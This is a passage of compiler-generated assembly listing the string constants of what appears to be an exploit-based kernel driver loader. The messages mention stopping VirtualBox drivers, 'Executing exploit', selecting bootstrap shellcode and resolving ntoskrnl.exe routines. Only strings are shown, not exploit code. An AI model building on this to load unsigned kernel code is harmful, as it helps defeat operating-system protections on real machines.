' ', 00H, 'c', 00H, 'a', 00H, 'n', 00H, 'n', 00H DB 'o', 00H, 't', 00H, ' ', 00H, 'c', 00H, 'o', 00H, 'n', 00H, 't' DB 00H, 'i', 00H, 'n', 00H, 'u', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ CONST SEGMENT ??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o' DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't' DB 00H, 'L', 00H, 'w', 00H, 'f', 00H, ',', 00H, ' ', 00H, 'c', 00H DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c' DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H DB 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ CONST SEGMENT ??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ DB 'V' DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't', 00H DB 'L', 00H, 'w', 00H, 'f', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ CONST SEGMENT ??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o' DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't' DB 00H, 'A', 00H, 'd', 00H, 'p', 00H, ',', 00H, ' ', 00H, 'c', 00H DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c' DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H DB 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ CONST SEGMENT ??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ DB 'V' DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't', 00H DB 'A', 00H, 'd', 00H, 'p', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ CONST SEGMENT ??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o' DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'U', 00H, 'S', 00H, 'B' DB 00H, 'M', 00H, 'o', 00H, 'n', 00H, ',', 00H, ' ', 00H, 'c', 00H DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c' DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H DB 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ CONST SEGMENT ??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ DB 'V' DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'U', 00H, 'S', 00H, 'B', 00H DB 'M', 00H, 'o', 00H, 'n', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ CONST SEGMENT ??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'A', 00H, 'c', 00H DB 't', 00H, 'i', 00H, 'v', 00H, 'e', 00H, ' ', 00H, 'V', 00H, 'i' DB 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H DB 'o', 00H, 'x', 00H, ' ', 00H, 'f', 00H, 'o', 00H, 'u', 00H, 'n' DB 00H, 'd', 00H, ' ', 00H, 'i', 00H, 'n', 00H, ' ', 00H, 's', 00H DB 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, ',', 00H, ' ' DB 00H, 'a', 00H, 't', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'p', 00H DB 't', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o', 00H, 'p', 00H, ' ' DB 00H, '(', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H DB 'd', 00H, ')', 00H, ' ', 00H, 'i', 00H, 't', 00H, ' ', 00H, 'd' DB 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 's', 00H DB 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ CONST SEGMENT ??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ DB '\', 00H, 'D', 00H DB 'e', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ CONST SEGMENT ??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ DB 'V', 00H, 'B', 00H DB 'o', 00H, 'x', 00H, 'D', 00H, 'r', 00H, 'v', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ CONST SEGMENT ??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'o', 00H, 'p', 00H, 'e' DB 00H, 'n', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'S', 00H DB 'C', 00H, 'M', 00H, ' ', 00H, 'd', 00H, 'a', 00H, 't', 00H, 'a' DB 00H, 'b', 00H, 'a', 00H, 's', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ CONST SEGMENT ??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a' DB 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H DB 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B' DB 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H DB 'v', 00H, 'e', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'G', 00H, 'e' DB 00H, 't', 00H, 'S', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H DB 'm', 00H, 'D', 00H, 'i', 00H, 'r', 00H, 'e', 00H, 'c', 00H, 't' DB 00H, 'o', 00H, 'r', 00H, 'y', 00H, ' ', 00H, 'f', 00H, 'a', 00H DB 'i', 00H, 'l', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ CONST SEGMENT ??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'x', 00H DB 'e', 00H, 'c', 00H, 'u', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'g' DB 00H, ' ', 00H, 'e', 00H, 'x', 00H, 'p', 00H, 'l', 00H, 'o', 00H DB 'i', 00H, 't', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ CONST SEGMENT ??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'R', 00H, 'e', 00H DB 's', 00H, 'o', 00H, 'l', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g' DB 00H, ' ', 00H, 'k', 00H, 'e', 00H, 'r', 00H, 'n', 00H, 'e', 00H DB 'l', 00H, ' ', 00H, 'i', 00H, 'm', 00H, 'p', 00H, 'o', 00H, 'r' DB 00H, 't', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ CONST SEGMENT ??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'W', 00H, 'i', 00H DB 'n', 00H, 'd', 00H, 'o', 00H, 'w', 00H, 's', 00H, ' ', 00H, '1' DB 00H, '0', 00H, ' ', 00H, 'R', 00H, 'S', 00H, '2', 00H, '+', 00H DB ' ', 00H, 'b', 00H, 'o', 00H, 'o', 00H, 't', 00H, 's', 00H, 't' DB 00H, 'r', 00H, 'a', 00H, 'p', 00H, ' ', 00H, 's', 00H, 'h', 00H DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e' DB 00H, ' ', 00H, 's', 00H, 'e', 00H, 'l', 00H, 'e', 00H, 'c', 00H DB 't', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ CONST SEGMENT ??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'e', 00H DB 'f', 00H, 'a', 00H, 'u', 00H, 'l', 00H, 't', 00H, ' ', 00H, 'b' DB 00H, 'o', 00H, 'o', 00H, 't', 00H, 's', 00H, 't', 00H, 'r', 00H DB 'a', 00H, 'p', 00H, ' ', 00H, 's', 00H, 'h', 00H, 'e', 00H, 'l' DB 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e', 00H, ' ', 00H DB 's', 00H, 'e', 00H, 'l', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e' DB 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ CONST SEGMENT ??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'h', 00H DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e' DB 00H, ' ', 00H, 'a', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H DB 'a', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't' DB 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ CONST SEGMENT ??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'u', 00H, 'n' DB 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H, ' ', 00H, 't', 00H DB 'o', 00H, ' ', 00H, 'a', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c' DB 00H, 'a', 00H, 't', 00H, 'e', 00H, ' ', 00H, 's', 00H, 'h', 00H DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e' DB 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ CONST SEGMENT ??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'Z', 00H, 'w', 00H DB 'C', 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H, '0' DB 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ CONST SEGMENT ??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'Z', 00H, 'w' DB 00H, 'C', 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H DB 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's', 00H, 's' DB 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'f', 00H DB 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_07IPICGNAN@ZwClose@ CONST SEGMENT ??_C@_07IPICGNAN@ZwClose@ DB 'ZwClose', 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ CONST SEGMENT ??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'P', 00H, 's', 00H DB 'C', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 't', 00H, 'e', 00H, 'S' DB 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'T', 00H DB 'h', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 'd', 00H, ' ', 00H, '0' DB 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ CONST SEGMENT ??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'P', 00H, 's' DB 00H, 'C', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 't', 00H, 'e', 00H DB 'S', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'T' DB 00H, 'h', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 'd', 00H, ' ', 00H DB 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's', 00H, 's' DB 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'f', 00H DB 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ CONST SEGMENT ??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ DB 'PsCreateSystemThread', 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ CONST SEGMENT ??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'x', 00H DB 'A', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H, 'a', 00H, 't' DB 00H, 'e', 00H, 'P', 00H, 'o', 00H, 'o', 00H, 'l', 00H, 'W', 00H DB 'i', 00H, 't', 00H, 'h', 00H, 'T', 00H, 'a', 00H, 'g', 00H, ' ' DB 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ CONST SEGMENT ??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'E', 00H, 'x' DB 00H, 'A', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H, 'a', 00H DB 't', 00H, 'e', 00H, 'P', 00H, 'o', 00H, 'o', 00H, 'l', 00H, 'W' DB 00H, 'i', 00H, 't', 00H, 'h', 00H, 'T', 00H, 'a', 00H, 'g', 00H DB ' ', 00H, 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's' DB 00H, 's', 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H DB 'f', 00H, 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ CONST SEGMENT ??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ DB 'ExAllocatePoolWithTag', 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ CONST SEGMENT ??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'n', 00H, 't', 00H DB 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H, 'l', 00H, '.' DB 00H, 'e', 00H, 'x', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H DB 'a', 00H, 'd', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't' DB 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ CONST SEGMENT ??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i' DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'n', 00H, 't' DB 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H, 'l', 00H DB '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ CONST SEGMENT ??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ DB 'n' DB 00H, 't', 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H DB 'l', 00H, '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ CONST SEGMENT ??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'L', 00H, 'o', 00H DB 'a', 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'n' DB 00H, 't', 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H DB 'l', 00H, '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ CONST SEGMENT ??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'I', 00H, 'n', 00H DB 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i' DB 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i', 00H DB 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd' DB 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't', 00H, ' ', 00H DB '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ CONST SEGMENT ??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i' DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'i', 00H, 'n' DB 00H, 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'd', 00H, 'r', 00H DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i' DB 00H, 'l', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ CONST SEGMENT ??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'K', 00H, 'e', 00H DB 'r', 00H, 'n', 00H, 'e', 00H, 'l', 00H, ' ', 00H, 'b', 00H, 'a' DB 00H, 's', 00H, 'e', 00H, ' ', 00H, '=', 00H, ' ', 00H, '0', 00H DB 'x', 00H, 